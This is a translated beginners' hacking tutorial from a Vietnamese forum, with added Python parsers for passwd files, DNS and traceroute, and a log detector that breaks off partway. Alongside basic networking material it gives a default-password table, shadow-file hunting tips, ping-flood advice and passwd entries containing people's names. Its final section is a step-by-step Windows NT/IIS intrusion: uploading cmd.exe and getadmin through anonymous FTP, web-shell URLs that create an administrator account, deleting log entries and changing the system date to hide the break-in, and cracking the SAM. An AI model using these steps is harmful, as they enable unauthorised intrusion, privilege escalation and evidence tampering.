Sincere thanks to the person who provided UDS with this book.

The most basic things you need to know to become a hacker - Part 1
Many newbies have asked me what hacking is and how to hack. What they forget is that you first need a general grounding: you have to understand the terms that people who know networking use all the time. I am not especially skilled myself, but through my own study I have put together some basic knowledge that I want to share with all of you, so that we can learn together. I take no responsibility if you use this to harass other people. You may copy or repost this on other sites, but please put the author's name under the article; respecting this article means respecting me and the work that went into it, and respecting yourselves as well. I have also included some hacking and cracking techniques and basic examples that you can try out and study closely to understand more, and whenever you come across a term you do not understand, read this article to learn it. I have used parts of articles I found very good on the HVA website and on other sites I have visited; thanks to the authors of those articles. Now to the main subject.

1.) What do we need to get started?

Many of you may disagree with me, but the best way to practice is to start on Windows 9x and then move on to something more powerful such as Linux or Unix. This is what you need:
+ An operating system (DOS, Windows 9x, Linux or Unix will do).
+ A good website to learn from (HVA, for example).
+ A good web browser (Netscape or IE, though Mozilla is probably the best).
+ A good chat tool (mIRC, Yahoo Messenger, ...).
+ Telnet, plus similar tools such as nmap.
+ Most important of all: anyone who wants to become a hacker must know at least a little programming (C, C++, Visual Basic, Perl, ...).

2.) What is an IP address?

_ An IP address is made of four numbers, each in the range 0-255. Each number is stored in one byte, so an IPv4 address is 4 bytes long. Addresses were originally divided into classes; the three used for hosts are A, B and C. A class A network holds about 16 million addresses (2^24), a class B network 65,536 (2^16) and a class C network 256. Example: the class B network 132.25 covers every address from 132.25.0.0 to 132.25.255.255 (132.25.0.0/16 in today's CIDR notation). Most class A blocks belong to large companies or organisations; an ISP typically owns a few class B or class C blocks. So if your IP address is 132.25.23.24, the owner of 132.25.x.x (which a whois lookup will tell you) is most likely your ISP.
_ IP stands for Internet Protocol. On the Internet each connected machine has its own IP address and that address stands for the machine; computers use it to identify each other when they connect. This is why you can be banned from IRC by address, and it is how people track down your IP.
Your IP address is easy to discover. Among other ways, people can get it when:
+ you visit a web page: the server logs your IP;
+ you are on IRC: anyone can look up your IP;
+ you are on ICQ: everyone can see your IP, even if you select "do not show IP";
+ you connect directly to someone: they can type "netstat -n" and see who is connected to them;
+ someone sends you an email carrying a piece of Java or script code that reports your IP back to them.
(HVA material)

3.) How do I find my own IP address?

_ In Windows: go to Start -> Run and type the command winipcfg (Windows 9x; on NT-based Windows use ipconfig at the command prompt).
_ In mIRC: connect to a server and then type the command /dns <your nick>.
_ Through one of the websites that display the IP address you are connecting from.

4.) What is IP spoofing?

_ An IP address is meant to identify one specific device in the world. Because of that, a server on the network may let another device exchange data with it purely on the strength of its address, without any further check.
However, the source address of a packet can be forged: you can send a packet to another machine that makes it believe the packet came from some other host (naturally not yours). In that way you can get past an address-based check on a server without having any control over the host you are impersonating. The catch is that the server's replies go to the device that really owns the spoofed address, not to you, so in general you will not see the responses you want (this is called blind spoofing). IP spoofing is therefore mainly useful when you need to get through a filter that trusts addresses, to abuse address-based trust for account theft, or simply to hide where traffic really comes from.
(HVA material)

5.) What are trojans, worms, viruses and logic bombs?

_ Trojan: put simply, a spy program planted on someone else's machine to steal material from that machine and send it back to whoever planted it. What it steals can be passwords, accounts or cookies, whatever its owner wants.
_ Virus: put simply, a program carrying special code that is installed on (or spreads from another machine to) the victim's computer and does whatever that code says; most viruses are used to destroy data or damage the computer.
_ Worm: a stand-alone program that can copy itself and spread throughout a network on its own. Like a virus it can destroy data or damage the inside of a network, and it often brings the whole network down.
_ Logic bomb: code hidden inside a program that lies dormant until a condition is met (a date, an account being removed) and then does its damage. Do not confuse it with a flooder or mail bomb: a program that sends a large number of packets (or messages) to one address at once, flooding the system, choking its link (on a server) or simply bombarding the target.

6.) What is PGP?

_ PGP stands for Pretty Good Privacy. It is a tool that uses public-key encryption to protect email and data files. It is a high-security form of encryption, available as software for MS-DOS, Unix, VAX/VMS and other platforms.

7.) What is a proxy?

_ A proxy gives users Internet access through a single host. Proxy servers serve a particular protocol, or a set of protocols, and run on a dual-homed host or a bastion host. The user's client programs talk to the proxy server instead of to the real server the user wants to reach. The proxy examines the requests coming from the client and decides whether or not to serve them; if a request is allowed, the proxy connects to the real server on the client's behalf, relays the client's requests on to the server and relays the server's responses back to the client. The proxy server is thus a go-between linking client and server.
_ For the user, a proxy gives access to Internet services as if it were direct. With a plain dual-homed host the user has to log in to the host before using any Internet service, which is inconvenient, and some people get frustrated at so obviously working "through the firewall"; a proxy solves that. It does require client support for the proxy protocol, but on the whole it is convenient for users. Because the proxy lets users reach Internet services from their own machines, no packet travels directly between the internal system and the Internet; the path is always indirect, through the dual-homed host or through a combination of bastion host and screening router.

(Article by Z3RON3, HVA material)

8.) What is Unix?

_ Unix is an operating system (like Windows). It is currently the most powerful operating system and the one closest to hackers' hearts; if you are going to be a real hacker you cannot do without it. It is also the native home of C programming.

9.) What is Telnet?

_ Telnet is a program that lets you connect to another machine on a given port. Every computer or server has ports; some common ones are:
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (mail)
+ Port 37: Time
+ Port 43: Whois
_ Example: you can use Telnet to connect to mail.virgin.net on port 25 and talk SMTP to it by hand.

10.) How do I know I have telnetted into a Unix system?
_ OK, here is how a Unix system greets you when you connect to it. When you connect, it will usually show a prompt such as "login:" (that alone does not prove it is Unix, unless a banner appears above the prompt, for example "Welcome to SHUnix. Please log in."). At the login prompt you have to enter a valid account name (traditionally at most 8 characters). After the account name you are asked for a password. On old or carelessly installed systems you can try the default passwords in the table below; on any maintained system these accounts are long gone or locked:

CODE
Account        Default password
root           root
sys            sys / system / bin
bin            sys / bin
mountfsys      mountfsys
nuucp          anon
anon           anon
user           user
games          games
install        install
demo           demo
guest          guest


11.) What is a shell account?

_ A shell account lets you use your home computer as a terminal from which you type commands to a computer running Unix. The shell is the program that reads the characters you send and turns them into commands for Unix programs. With a proper shell account you get a far more powerful workstation than you might imagine. You can get a free shell account at http://www.freeshell.com/, although you cannot telnet out from it until you pay.

12.) How can I crack Unix account passwords?

_ It is simple in principle, but the method I describe here is out of date: you may crack something if you are lucky; otherwise treat it as background.
_ First log in to a Unix system as a customer or a guest. If you are lucky, you will find the password data kept in the standard place on such systems:

/etc/passwd

Each line of the passwd file is one account and looks like this:

userid:password:userid#:groupid#:GECOS field:home dir:shell

where:
+ userid: the login name; it may be a name or a number.
+ password: the password hash (you know what that is for). On old systems the hash itself sits here.
+ userid#: a unique number given to the user when the account was first created (the UID).
+ groupid#: like userid#, but for the group the user belongs to (the GID), for example HVA's Hunter Bug group.
+ GECOS field: information about the user, such as full name, phone number and address. This is also a good source of guesses for cracking that user's password.
+ home dir: the user's home directory, the directory they land in at login.
+ shell: the name of the shell started automatically when the user logs in.
_ Take the passwd file, fetch the text file with the hashed passwords, and run "CrackerJack" or "John the Ripper" against it.
_ Easy enough? Not at all. You need a lot of luck to crack anything, because nearly everyone now keeps the hashes out of passwd; keep reading and you will see where the difficulty lies.

13.) What is a shadowed password?

_ A shadowed password is what you see in the Unix passwd file when, instead of the hash, the password field holds only a placeholder (an "x" or "*"). It tells you that the real hashes are kept somewhere else, in a file an ordinary user cannot read. Does that mean giving up? Not for a hacker, of course: if the shadow file itself is out of reach, look for copies and backups of it, or for an older unshadowed copy of passwd. The location of the shadow file is not the same on every Unix; try the following paths one by one:

CODE
System                      Shadow file                                Token in passwd
AIX 3                       /etc/security/passwd                       !
                            or /tcb/auth/files/<first letter of username>/<username>
A/UX 3.0s                   /tcb/files/auth/?/*
BSD4.3-Reno                 /etc/master.passwd                         *
ConvexOS 10                 /etc/shadpw                                *
ConvexOS 11                 /etc/shadow                                *
DG/UX                       /etc/tcb/aa/user/                          *
EP/IX                       /etc/shadow                                x
HP-UX                       /.secure/etc/passwd                        *
IRIX 5                      /etc/shadow                                x
Linux 1.1                   /etc/shadow                                *
OSF/1                       /etc/passwd[.dir|.pag]                     *
SCO Unix #.2.x              /tcb/auth/files/<first letter of username>/<username>
SunOS 4.1+c2                /etc/security/passwd.adjunct               ##username
SunOS 5.0                   /etc/shadow
                            (optional NIS+ private secure maps/tables/whatever)
System V Release 4.0        /etc/shadow                                x
System V Release 4.2        /etc/security/* database
Ultrix 4                    /etc/auth[.dir|.pag]                       *
UNICOS                      /etc/udb                                   *

The first column of each row is the system; find the one you are after and follow the path in the second column. The third column is what appears in the password field of passwd on that system.
And finally, here are passwd entries of accounts I once cracked (they are probably no longer valid):

CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

To protect their privacy I removed the hashes and put an "x" in their place; see what information you can still pull out of these lines.
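To make the field layout of sections 12 and 13 concrete, here is a small parser, added as an example for this text and not part of the original article, that reads passwd-style lines, classifies each password field (hash present, shadowed, locked or empty) and pulls out the GECOS words a cracker would feed into a wordlist first. The sample lines are constructed for this example; none of the hashes belong to a real account.

```python
"""Parse /etc/passwd-style lines and tell shadowed entries from directly crackable ones.

Added example: the sample lines below are constructed for illustration, not
taken from any real system.
"""
from dataclasses import dataclass

# Constructed sample: modular ($6$) hash, classic 13-char crypt hash, shadowed
# entry ("x"), locked account ("*") and an account with no password at all.
SAMPLE_PASSWD = """\
root:$6$saltsalt$constructedhashvalue:0:0:root:/root:/bin/bash
graham:ab9/ckdqMfZbk:1001:1001:Graham Smith,Room 12,555-0100:/home/graham:/bin/sh
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
daemon:*:2:2:daemon:/sbin:/usr/sbin/nologin
guest::1002:1002:Guest account:/home/guest:/bin/sh
"""

LOCKED = {"*", "!", "!!", "*LK*", "*NP*"}


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def status(self) -> str:
        """Classify the password field the way an auditor (or a cracker) would."""
        p = self.password
        if p == "":
            return "empty"          # login needs no password at all
        if p == "x":
            return "shadowed"       # the real hash lives in the shadow file
        if p in LOCKED:
            return "locked"
        if p.startswith("$"):
            return "modular-hash"   # $1$ MD5, $5$/$6$ SHA-2, $y$ yescrypt, ...
        if len(p) == 13:
            return "des-crypt"      # classic crypt(3): 2-char salt + 11 chars
        return "unknown"

    @property
    def crackable_here(self) -> bool:
        """True when the hash itself is in this file, so no shadow file is needed."""
        return self.status in ("des-crypt", "modular-hash")


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Split each non-comment line into the seven colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def gecos_words(entry: PasswdEntry) -> list[str]:
    """GECOS tokens (name, room, phone) that a wordlist attack would try first."""
    return [w for part in entry.gecos.split(",") for w in part.split()]


def audit(text: str) -> dict[str, str]:
    """Map each account to its password-field status."""
    return {e.name: e.status for e in parse_passwd(text)}


if __name__ == "__main__":
    for e in parse_passwd(SAMPLE_PASSWD):
        flag = "crackable from passwd" if e.crackable_here else "needs shadow file"
        print(f"{e.name:8} {e.status:13} {flag}  gecos words: {gecos_words(e)}")
```

Run it on the listing above and every line comes back as "shadowed": the "x" in the second field is exactly the placeholder section 13 describes, which is why John the Ripper needs the shadow file (or its unshadow tool merging both files) rather than passwd alone.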

End of Part 1
Author: Anhdenday - HVAonline

The most basic things you need to know to become a hacker - Part 2 [10/11/2004 3:11:00 PM]

14.) What is a port?

A virtual port is a number carried in the TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) headers. As everyone knows, Windows can run many programs at once, and each of them has its own port for sending and receiving data.
For example, a machine with IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server and so on, all on that one address. When a packet arrives, how does the computer know whether it is meant for the web server, the FTP server or SMTP? That is what ports are for. Every service has a default port number: FTP uses 21, web service 80, POP3 110, SMTP 25 and so on.

The network administrator can change these defaults, and if you do not know the port a service listens on, you cannot connect to it. You have probably heard of PORT MAPPING without knowing what it is or what it does. Port mapping is simply moving a service from its default port to another number. The default port for a web server is 80, but you will sometimes see http://www.xxx.com:8080/; 8080 is the port on host xxx, which its administrator "mapped" from 80 to 8080.

(HVA material)

15.) What is DNS?

_ DNS stands for Domain Name System. A DNS server listens on port 53, so to talk to it you connect to port 53 (UDP for ordinary queries, TCP for large answers and zone transfers). A DNS server translates alphabetic hostnames into the corresponding numeric addresses and back again, for example 127.0.0.1 --> localhost and localhost --> 127.0.0.1.

(HVA material)
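The exchange a resolver has with a server on port 53 is easy to see byte by byte. The following is an added example for this section, not code from the original article: it builds a DNS A query exactly as it goes on the wire, decodes a reply (including the name-compression pointers real servers use), and refuses any reply whose transaction id and question do not match the query, which is the check that makes the spoofing of section 4 harder. CONSTRUCTED_REPLY is a hand-built answer for the query build_query("localhost"); resolve_a() talks to a real server and therefore needs network access.

```python
"""Build a DNS A query and decode the reply byte by byte, the exchange a
resolver has with a name server on port 53.

Added example. CONSTRUCTED_REPLY is a hand-built answer for the query
build_query("localhost"); resolve_a() needs network access and a real server.
"""
import socket
import struct


def encode_name(name: str) -> bytes:
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """12-byte header (id, flags RD=1, qdcount=1) followed by one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def decode_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Read a (possibly compressed) name; return it and the offset just past it."""
    labels, end, jumped = [], offset, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                     # pointer: 2 bytes, 14-bit offset
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        if length == 0:
            if not jumped:
                end = offset + 1
            break
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end


def parse_response(msg: bytes) -> dict:
    """Decode header, question section and answer section of a DNS message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    questions, answers = [], []
    for _ in range(qd):
        qname, offset = decode_name(msg, offset)
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((qname, qtype))
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, "A", ttl, socket.inet_ntoa(rdata)))
        else:
            answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "rcode": flags & 0xF, "questions": questions, "answers": answers}


def matches(query: bytes, response: bytes) -> bool:
    """Accept a reply only if its id and question match what we sent (anti-spoofing)."""
    q, r = parse_response(query), parse_response(response)
    return q["id"] == r["id"] and q["questions"] == r["questions"]


# Hand-built reply: same id, flags QR|RD|RA (0x8180), question echoed, one A
# record whose name is a pointer (0xC00C) back to the question name at offset 12.
CONSTRUCTED_REPLY = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    + encode_name("localhost") + struct.pack("!HH", 1, 1)
    + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 3600, 4) + socket.inet_aton("127.0.0.1")
)


def resolve_a(name: str, server: str = "127.0.0.1", timeout: float = 2.0) -> list[str]:
    """Send the query over UDP/53 to a real server (needs network access)."""
    query = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        data, _ = s.recvfrom(512)
    if not matches(query, data):
        raise ValueError("reply does not match the query")
    return [a[3] for a in parse_response(data)["answers"] if a[1] == "A"]
```

The 16-bit id is the only thing tying a UDP reply to its query, which is why resolvers also randomise the source port; with a fixed id like the 0x1234 default here, a forged answer is trivial to slip in, so use a random id in anything real.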

16.) A few words about WinGate:

_ WinGate is a simple program for sharing a connection, for example one modem between two or more machines. Used together with several proxies, WinGate can also hide you.
_ How does WinGate hide you? Do as follows: telnet to port 23 on a host running the WinGate telnet proxy and you get a "WinGate>" prompt. At that prompt type the name of the server you want, a space, and the port you want to connect to. Example:

CODE
telnet wingate.net
WinGate> victim.com 23

We telnet to port 23 because that is the default port after a WinGate install. The IP address the victim's machine now records for us is that of the host running the WinGate proxy.
_ How do you find WinGates?
+ To find WinGates with a static IP (one that does not change), go to Yahoo or another search engine and search for cable modems: many cable-modem users run WinGate to share the fast connection with the other machines in the house. Or use a port or domain scanner and scan for port 1080.
+ To find the dynamic IP (one that changes every time the user connects) of a WinGate, you can use Domscan or another scanner. In Domscan enter any IP range in the first box and 23 in the second box. When you have results, telnet to each address in turn (as above); if a "WinGate>" prompt appears, you have found a machine running WinGate.
+ From my own experience, the easiest way is to download a wingatescanner; there are plenty on the net.

17.) A few words about traceroute:

_ Traceroute is a program that lets you determine the path packets take from your machine to a target system across the Internet.
_ Look at the following example:

CODE
C:\windows> tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms 1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms 1216 ms 1233 ms
8 asianet.com (202.12.32.10) 1210 ms 1239 ms 1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms 1087 ms 1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms 1109 ms 1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms 1146 ms 1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms 1159 ms 1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

I wanted to know the path from my machine to a host on the Internet with IP address 203.94.12.54, so I ran tracert against it. As you can see above, packets from my machine must pass through 13 hops to reach 203.94.12.54; that is the route the packets take.
_ Now look at the next example:

CODE
host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ The first line gives the hostname and IP address of the target. It also tells us the maximum TTL (30 hops) and the size of each datagram, 40 bytes (20-byte IP header + 8-byte UDP header + 12 bytes of user data).
+ The second line shows the first router that received the datagram, 202.xy.34.12. The datagram reached it with TTL = 1, so the router sent traceroute an ICMP "Time Exceeded" error. Traceroute then sends the next datagram, with TTL = 2, towards the target.
+ The third line: xyz.com (202.xx.12.34) received the datagram with TTL = 1 (the first router decremented it from 2 to 1). xyz.com is not a router, and traceroute sends to an unused high UDP port, so the host replies with an ICMP "Port Unreachable" error. On receiving that message traceroute knows it has reached the target xyz.com and stops.
+ If a router does not reply within 5 seconds, traceroute prints an asterisk "*" (unknown) and carries on sending datagrams towards the target.
_ Note:
In Windows: tracert hostname (tracert probes with ICMP echo requests instead of UDP, so the final hop answers with an echo reply rather than "Port Unreachable")
In Unix: traceroute hostname

(viethacker.net material)
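Reading traceroute output by eye works for two hops, not for a 13-hop listing with timeouts. The parser below is an added example for this section (not code from the original article): it handles both the Unix "host (ip)" and the Windows tracert "host [ip]" layouts, records each probe's RTT or a "*" timeout, and summarises whether the target answered, which hops stayed silent and where the largest latency jump is (the jump from hop 3 to hop 4 in the listing above is the international link). SAMPLE is constructed to mirror that listing; its addresses and names are not real.

```python
"""Parse traceroute/tracert output and summarise the path.

Added example. SAMPLE is constructed to mirror the listing above; the
addresses and names in it are not real.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
Tracing route to 203.94.12.54 over a maximum of 30 hops

  1  abc.netzero.com (232.61.41.251)  2 ms  1 ms  1 ms
  2  232.61.41.10 (232.61.41.10)  9 ms  11 ms  13 ms
  3  we21.spectranet.com (196.1.83.12)  535 ms  549 ms  513 ms
  4  * * *
  5  backbone.isp.ny (198.87.12.11)  1208 ms 1216 ms 1233 ms
  6  203.94.12.54 (203.94.12.54)  1052 ms  642 ms  658 ms
"""

TARGET_RE = re.compile(r"(?:Tracing route to|traceroute to)\s+(\S+)(?:\s+\((\S+)\))?")
HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
# "host (ip)" as Unix traceroute prints it, "host [ip]" as tracert does, or a bare ip
ADDR_RE = re.compile(
    r"(?P<host>[A-Za-z0-9.\-]+)\s+[\(\[](?P<ip>\d{1,3}(?:\.\d{1,3}){3})[\)\]]"
    r"|(?P<bare>\d{1,3}(?:\.\d{1,3}){3})"
)
RTT_RE = re.compile(r"(?P<ms>\d+(?:\.\d+)?)\s*ms|(?P<lost>\*)")


@dataclass
class Hop:
    number: int
    host: Optional[str]
    ip: Optional[str]
    rtts: list = field(default_factory=list)   # float per probe, None for "*"

    @property
    def lost(self) -> bool:
        return all(r is None for r in self.rtts)

    @property
    def best(self) -> Optional[float]:
        answered = [r for r in self.rtts if r is not None]
        return min(answered) if answered else None


def parse_traceroute(text: str) -> tuple[Optional[str], list[Hop]]:
    """Return (target address from the header line, list of hops)."""
    target, hops = None, []
    for line in text.splitlines():
        t = TARGET_RE.search(line)
        if t:
            target = t.group(2) or t.group(1)
            continue
        m = HOP_RE.match(line)
        if not m:
            continue
        number, rest = int(m.group(1)), m.group(2)
        host = ip = None
        a = ADDR_RE.search(rest)
        if a:
            if a.group("bare"):
                host = ip = a.group("bare")
            else:
                host, ip = a.group("host"), a.group("ip")
            rest = rest[:a.start()] + rest[a.end():]   # RTTs may sit before or after the address
        rtts = [None if r.group("lost") else float(r.group("ms")) for r in RTT_RE.finditer(rest)]
        hops.append(Hop(number, host, ip, rtts))
    return target, hops


def summarize(text: str) -> dict:
    """Hop count, whether the target answered, silent hops, and the biggest latency jump."""
    target, hops = parse_traceroute(text)
    reached = bool(hops) and target in (hops[-1].ip, hops[-1].host)
    silent = [h.number for h in hops if h.lost]
    biggest, prev = (None, 0.0), None
    for h in hops:
        if h.best is None:
            continue                                # a silent hop tells us nothing about latency
        if prev is not None and h.best - prev > biggest[1]:
            biggest = (h.number, h.best - prev)
        prev = h.best
    return {"target": target, "hops": len(hops), "reached": reached,
            "silent_hops": silent, "biggest_jump": biggest}
```

The summary uses each hop's best RTT rather than the average: queueing delay inflates single probes, while the minimum approximates the fixed propagation time, so jumps in the minimum are the real long-haul links.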

18.) Ping and how to use it:

_ Ping is a very simple idea, but very useful for diagnosing a network. The word comes from sonar: a submarine sends out a "ping" to learn whether something is near it; if there is an object nearby the sound bounces off it and comes back as a "pong", so the submarine knows something is there.
_ On the Internet the idea is the same. The ping command sends an ICMP (Internet Control Message Protocol) echo request to a host; if the host answers with an echo reply ("pong"), the host is up (or at least reachable). Ping also tells you how long a packet takes to travel from your machine to the host and back.
_ Using ping is easy: open an MS-DOS window and type "ping <ip address>". By default it pings 4 times, but you can also type

CODE
ping <ip address> -t

which makes it ping until you stop it (Ctrl-C). To change the packet size:

CODE
ping -l <size> <ip address>

What ping does is send a packet to a computer and measure how long it takes to come back; that gives you the round-trip time and a rough idea of the speed of the connection (the round trip halved is sometimes quoted as the one-way "trip time"). Ping can also be used to slow down or crash a system by ping flooding. Windows 98 hung after about a minute of flooding (its connection buffers overflowed under the number of packets, so Windows decided to take a rest). A ping flood also eats a lot of your own bandwidth, so you need more bandwidth than the target (unless the target is a Windows 98 machine and you are on an average modem, in which case it goes down after roughly a minute). Ping floods are not very effective against anything stronger, unless you have several lines or control a fair number of hosts that all ping at once, adding up to more bandwidth than the target has.
Note: the DOS -t option does not flood; it just pings the target continuously, with a pause between consecutive pings. On Unix and Linux, ping -f (run as root) sends a real flood, firing the next request as fast as replies come in. The -f flag comes from the BSD ping that Linux and the commercial Unixes inherited, so almost any Unix-like system has it.

(HVA and viethacker.net material)

19.) Breaking into Windows NT from the Internet:

_ This was the first hack I practised when I started studying hacking, and now I will pass it on to you. It takes some time to carry out and is easy and hard at the same time. It relies on two things that were common around 1997-1999 and are long fixed on any maintained server: an IIS FTP service that lets anonymous users write into a directory that is also the web server's executable cgi-bin, and the Windows NT 4.0 "getadmin" privilege-escalation bug (fixed by Microsoft in a 1997 hotfix). Treat it as a case study. Let's begin:
_ First find a server running IIS.
_ Then open DOS and type FTP:

c:\> ftp www.dodgyinc.com

(that site still worked when I practised; I do not know whether they have fixed it since. If any of you know another site, post it so everyone can try.)
If the connection succeeds you see something like this:

CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):

That banner contains very useful information: the machine's NetBIOS name is Vdodgy. From it you can deduce the account NT uses for anonymous web access, which, if the administrator has not renamed it, is IUSR_VDODGY (IUSR_ followed by the machine name). Remember it; it will be useful. Enter "anonymous" as the user and you get:

CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Anonymous accepts any string as the password, so try "anonymous". If that fails, log in to the FTP service again, this time not as anonymous but as "Guest", and try "guest" as the password.
Now type in DOS:

CODE
cd /c

You will see the result if you have got in; now look quickly for the cgi-bin directory. If you are lucky it is easy to find, because administrators often put cgi-bin where you have just landed to make managing the server easier. The cgi-bin directory can hold programs that you can run from your web browser. Let's get to work.
_ First change into the cgi-bin directory and switch to binary mode with the "binary" command (you may not need it), then "put cmd.exe". Next you need the exploit files to upload here: look on the net for the two important ones, getadmin.exe and gasys.dll. Download them and, once you have them, upload them into cgi-bin. OK, all done; close the DOS window.
Now type this address into your browser:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

After a few seconds you get a reply like this:

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!

The anonymous web account is now an administrator, so anything you run through the web server runs with administrator rights. What you need now is an account of your own; type the following in IE:

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20anhdenday%20toilahacker%20/add

That command line creates an account with user name anhdenday and password toilahacker. Now give this user administrator rights too by typing in IE:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

That is it. Disconnect, go to Start menu -> Find -> Computer and search for www.dodgyinc.com. When it is found, choose Explore; the NT machine's shares open and you enter the user name and password (in my case anhdenday / toilahacker).

One problem is that your intrusion is logged, so to remove your traces go into Winnt\system32\logfiles, open the log files, delete the entries that refer to you and save them. If you want to disguise when the intrusion happened, you can change the date on the machine with this URL:

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

When done, delete getadmin.exe and gasys.dll from cgi-bin. The goal of breaking into this system is to take the administrator's password so that next time you can get in legitimately, so find the SAM file (which holds the administrator's and members' password hashes) and crack it with L0phtCrack (I have already posted a guide to L0phtCrack 3.02, so study it yourselves). Here is the link:
http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=
Once cracked you have the administrator's user name and password, so now delete your own account (mine was anhdenday) to be safe. You can do what you like inside the system, but do not wipe their data; leave it for them to work with.
How do you feel? Quite a hassle, isn't it? The first time I tried this it took me 4 hours; once you are used to it, the second time takes less.
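The sequence above leaves a very recognisable trail in exactly the log files the text says to clean: requests for cmd.exe or getadmin.exe under cgi-bin, and query strings carrying "net user ... /add" or a "date" command. The following detector is an added example for this section, written for the defender rather than the intruder and not code from the original article. It reads IIS W3C-extended log lines, using the #Fields: header to name the columns, and reports the entries that match that pattern. The log lines are constructed for the example; the field names are the standard IIS ones.

```python
"""Scan IIS W3C-extended log lines for the cgi-bin web-shell pattern described above.

Added example; the log lines are constructed for illustration and the
field names follow the IIS W3C extended format.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-30 10:01:02 10.0.0.5 GET /index.htm - 200
2003-04-30 10:01:20 10.0.0.5 GET /cgi-bin/getadmin.exe IUSR_VDODGY 502
2003-04-30 10:01:41 10.0.0.5 GET /cgi-bin/cmd.exe /c%20c:\\winnt\\system32\\net.exe%20user%20anhdenday%20toilahacker%20/add 200
2003-04-30 10:02:00 192.0.2.7 GET /products.htm - 200
2003-04-30 10:02:30 10.0.0.5 GET /cgi-bin/cmd.exe /c%20date%2030/04/03 200
"""

# Executables that have no business being reachable under a CGI directory.
SUSPECT_STEMS = {"cmd.exe", "getadmin.exe", "gasys.dll", "net.exe"}
# Query fragments that reveal account manipulation or clock tampering through a shell.
SUSPECT_QUERY = re.compile(
    r"(net(\.exe)?\s+user\b.*\s/add\b|net(\.exe)?\s+localgroup\b|\bdate\s+\d)", re.I
)


def parse_w3c(text):
    """Yield one dict per entry, using the #Fields: header for column names."""
    fields = None
    for line in text.splitlines():
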